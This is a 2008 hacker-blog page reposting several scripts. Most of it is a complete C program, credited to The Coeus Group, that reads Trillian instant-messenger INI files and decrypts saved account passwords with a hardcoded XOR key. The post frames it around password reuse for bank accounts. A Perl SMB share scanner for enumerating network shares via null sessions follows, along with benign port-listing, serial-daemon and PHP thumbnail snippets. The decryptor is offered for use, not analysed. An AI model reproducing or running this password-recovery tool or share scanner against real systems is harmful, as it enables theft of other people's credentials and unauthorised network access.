Programming
Cpp: A Wireless Sniffer
by The Uni-Hacker on Sep.30, 2008, under Programming
Check it out here: http://www.hackerforums.org/index.php/topic,15.0.html
CPP: Cracking the Trillian INI file.
by The Uni-Hacker on Sep.30, 2008, under Programming
Crack the Trillian INI file.
/********************************
* trillian-ini-decrypt
* By The Coeus Group
* http://www.coeus-group.com
********************************
* Software: Trillian 0.73, possibly others.
* Issue: Weak "encryption" of saved passwords.
* Impact: Decryption of saved passwords.
* Severity: Medium. ish. The program only works locally, and only
* if the subject has saved their password, and really
* if someone can get into your AIM account, how earth-
* shattering is that??? However, since a lot of people
* use the same password for everything... What's easier,
* getting the password from Trillian, or Wells Fargo???
********************************
* Trillian is, according to trillian.cc, "...everything you need for instant
* messaging. Connect to ICQ®, AOL Instant Messenger(SM), MSN Messenger, Yahoo!
* Messenger and IRC in a single, sleek and slim interface."
*
* Upon examination of the Trillian directory (which defaults to
* C:\Program Files\Trillian\ ), it appears that passwords are stored in
* ini files that are located in {Path to Trillian}\users\{WindowsLogon}. The
* passwords are encrypted using a simple XOR with a key apparently uniform
* throughout every installation.
*
* This program takes, as command line argument(s), path(s) to these INI files.
* It will then display a list of usernames, "encrypted" passwords, and plaintext
* passwords.
*
* Evan Nemerson
* enemerson@coeus-group.com */
#include
#include
#include
#ifndef FALSE
#define FALSE 0
#endif
#ifndef TRUE
#define TRUE 1
#endif
void toupper(char* string);
int strlen(const char *s);
int strBeginsWith(const char *needle, const char *haystack);
int strIs(const char *subj, const char *eq);
void extractAcctounts(FILE *fp);
char *hex2str(char *string);
void decrypt();
void outPasswds();
void printhelp();
int main(int argc, char *argv[]);
struct account
{
char username[64];
char cyphertext[64];
char plaintext[32];
};
extern int errno;
struct account *pAccounts[32];
short int nAccounts = 0;
char key[] = "\xF3\x26\x81\xC4"
"\x39\x86\xDB\x92"
"\x71\xA3\xB9\xE6"
"\x53\x7A\x95\x7C";
void toupper(char* string)
{
short int x = 0;
for ( x = 0 ; x < (strlen(string)) ; x++ )
{
if ( ( string[x] > 96 ) && ( string[x] < 123 ) )
string[x] -= 32;
}
}
int strlen(const char *s)
{
short int n = 0;
while ( s[n] != 0 )
n++;
return n;
}
int strBeginsWith(const char *needle, const char *haystack)
{
short int x;
if ( strlen(needle) > strlen(haystack) )
return FALSE;
for ( x = 0 ; x < strlen(needle) ; x++ )
{
if ( needle[x] != haystack[x] )
return FALSE;
}
return TRUE;
}
int strIs(const char *subj, const char *eq)
{
short int x;
if ( strlen(subj) != strlen(eq) )
return FALSE;
for ( x = 0 ; x < strlen(subj) ; x++ )
{
if ( subj[x] != eq[x] )
return FALSE;
}
return TRUE;
}
void extractAcctounts(FILE *fp)
{
char buff[256], *ptr;
int x;
while ( !feof(fp) )
{
fgets(buff, 255, fp);
if ( strBeginsWith("name=", buff) )
{
buff[strlen(buff)-1] = 0;
pAccounts[nAccounts] = (struct account*)malloc(sizeof(struct account));
if ( pAccounts[nAccounts] == NULL )
{
perror("Failed to malloc()");
exit(errno);
}
ptr = pAccounts[nAccounts]->username;
for ( x = 5 ; x < strlen(buff) ; x++ )
{
ptr[x-5] = buff[x];
}
ptr[x-5] = 0;
nAccounts++;
}
if ( strBeginsWith("password=", buff) )
{
buff[strlen(buff)-1] = 0;
ptr = pAccounts[nAccounts-1]->cyphertext;
for ( x = 9 ; x < strlen(buff) ; x++ )
{
ptr[x-9] = buff[x];
}
ptr[x-9] = 0;
}
}
}
char *hex2str(char *string)
{
int x=0,n=0,i=0;
unsigned char hex[2];
unsigned char *out;
out = (unsigned char*)malloc((strlen(string)/2)+1);
if ( out == NULL )
{
perror("Failed to malloc()");
exit(errno);
}
// For hex number...
for ( x = 0 ; x < strlen(string) ; x+=2 )
{
out[i] = 0;
// Convert ASCII 0-F to decimal.
hex[0] = string[x]-48;
hex[1] = string[x+1]-48;
for ( n = 0 ; n < 2 ; n++ )
{
if ( hex[n] > 9 )
hex[n] -= 7;
}
out[i++] = (hex[0]*16)+hex[1];
}
out[i++] = 0;
return out;
}
void decrypt()
{
int n, x;
char *plain, *cypher;
for ( x = 0 ; x < nAccounts ; x++ )
{
cypher = hex2str(pAccounts[x]->cyphertext);
plain = pAccounts[x]->plaintext;
for ( n = 0 ; n < (strlen(cypher)-1) ; n++ )
{
plain[n] = cypher[n] ^ key[n];
}
}
}
void outPasswds()
{
int x;
printf(
"/----------------------------\\\n"
"| trillian-ini-decrypt |\n"
"| By The Coeus Group |\n"
"| http://www.coeus-group.com |\n"
"\\----------------------------/\n");
printf("Found %d accounts.\n\n", nAccounts);
for ( x = 0 ; x < nAccounts ; x++ )
{
printf( "Username: : %s\n"
"Password (encrypted): %s\n"
"Password (decrypted): %s\n\n",
pAccounts[x]->username,
pAccounts[x]->cyphertext,
pAccounts[x]->plaintext
);
}
}
void printhelp()
{
printf( "Just put the path to Trillian INI file as command-line\n"
"parameter. Don't forget to quote as needed. Will accept\n"
"multiple files.\n");
exit(0);
}
int main(int argc, char *argv[])
{
short int x;
FILE *fp;
if ( ( argc < 2 ) ) { printhelp(); }
if ( ( strIs(argv[1], "-h") ) |
( strIs(argv[1], "--help") ) |
( strIs(argv[1], "/?") )
) printhelp();
for ( x = 1 ; x < argc ; x++ )
{
fp = fopen(argv[x], "r");
if ( fp == NULL )
{
perror("Error");
exit(errno);
}
extractAcctounts(fp);
}
decrypt();
outPasswds();
return 0;
}
Perl: Find listening ports on your Linux computer.
by The Uni-Hacker on Sep.30, 2008, under Programming
Here is a basic perl script that will list all listening ports on your Linux computer.
#!/usr/bin/perl -w
use strict;
foreach (`netstat -an`) {
print "Service: ", getservbyport($1,"tcp")||$1, " is listening\n" if (/\*\.(\d+).+LISTEN/);
};
Perl: A windows share scanner written in Perl.
by The Uni-Hacker on Sep.30, 2008, under Programming
I haven’t tested this, but the code looks legit. This should scan for SMB mounts on your network.
#!/usr/bin/perl ########################################### # Very lame and simpel SMBScanner! # # But it works (I think) :-) # # You need nbtscan and smbclient! # # NOTE: WITHOUT THESE PROGRAMS, THE SMB- # # SCANNER WON'T WORK!!! # # # # nbtscan: ############## # http://www.inetcat.org/software/nbtscan-1.0.2.tar.gz # # ############## # smbclient (samba): ########### # ftp://ftp.samba.org/pub/samba/samba-latest.tar.gz # # ########### # # # Martin J. Muench# # http://mjm.gmc-online.de # ########################################### chomp($NBTSCAN=`which nbtscan`); chomp($SMBCLIENT=`which smbclient`); if (-e $SMBCLIENT && -e $NBTSCAN) { print "smbclient and nbtscan found, starting...\n\n"; } else { print "You need smbclient and nbtscan, exiting...\n"; exit(0); } if ($#ARGV < 0) { &usage; exit(0); } $iprange=$ARGV[0]; @server=`$NBTSCAN -s : $iprange`; $ZEICHEN='-a-zA-Z0-9-\:\.'; foreach $line (@server) { $line=~s/[^$ZEICHEN]//go; @part=split(/:/, $line); if ($part[1] ne " ") { &sharesearch; } } sub sharesearch { if ($part[3] ne " ") { @shares=`$SMBCLIENT -I $part[0] -L $part[1] -N -U $part[3]`; } else { @shares=`$SMBCLIENT -I $part[0] -L $part[1] -N`; } foreach $grep (@shares) { if ($grep =~ m/Disk/) { $grep =~ s/Disk/:/g; $grep =~s/[^$ZEICHEN]//go; @share=split(/:/, $grep); if ($part[3] ne " ") { print "smbclient \/\/$part[1]\/$share[0] -I $part[0] -N -U $part[3]\n"; } else { print "smbclient \/\/$part[1]\/$share[0] -I $part[0] -N\n"; } } } } sub usage { print qq~ Very, very simple SMBScanner by Martin J. Muench Usage: $0 = Single IP: xxx.xxx.xxx.xxx IP-range: xxx.xxx.xxx.xxx/xx or xxx.xxx.xxx.xxx-xxx ~; }
PERL: A TCP Daemon written for Perl.
by The Uni-Hacker on Sep.30, 2008, under Programming
#!/usr/bin/perl
#
# A simple TCP daemon written in Perl. The script listens for connections on TCP port 7070,
# and passes text to and from the serial port. This allows multiple local or remote programs
# to interface with the I/O controller.
#
use IO::Select;
use IO::File;
use IO::Socket;
sub open_port {
my($portdevice, $portspeed) = @_;
system("/bin/stty -F $portdevice speed $portspeed raw > /dev/null 2>&1");
my $porthandle = new IO::File("+<$portdevice");
if ($porthandle) {
$porthandle->autoflush(1);
}
return $porthandle;
}
sub command {
my @ready;
my $s, $buf;
my($porthandle, $command) = @_;
my $read_set = new IO::Select();
$read_set->add($porthandle);
print $porthandle $command;
if (@ready = $read_set->can_read(2)) {
foreach $s (@ready) {
$buf = <$s>;
return $buf;
}
}
return 0;
}
$port = open_port("/dev/ttyUSB2", "2400");
$socket = new IO::Socket::INET (LocalHost => '127.0.0.1',
LocalPort => '7070',
Proto => 'tcp',
Listen => 16,
Reuse => 1,);
die "Could not create socket: $!\n" unless $socket;
$sock_set = new IO::Select($socket);
while (1) {
@rh_set = $sock_set->can_read();
foreach $rh (@rh_set) {
if ($rh == $socket) {
$ns = $rh->accept();
$ns->autoflush(1);
$sock_set->add($ns);
}
else {
$buf = <$rh>;
if ($buf) {
$out = command($port, $buf);
print $rh $out;
}
else {
$sock_set->remove($rh);
close($rh);
}
}
}
}
PHP: Show thumbnails from pics in a directory.
by The Uni-Hacker on Sep.30, 2008, under Programming
Here is some php code to produce and show thumbnails from a folder on your web server.
$directory = opendir("/home/cowkitty/public_html/CKStudios2002/sketch");
while ($file = readdir($directory)) {
if (preg_match("/\.jpg/",$file)) {
echo "<img src=\"drawthumb.php?http://cowkittystudios.com/sketch/$file\" border=1>";
echo " ";
}
}
closedir($directory);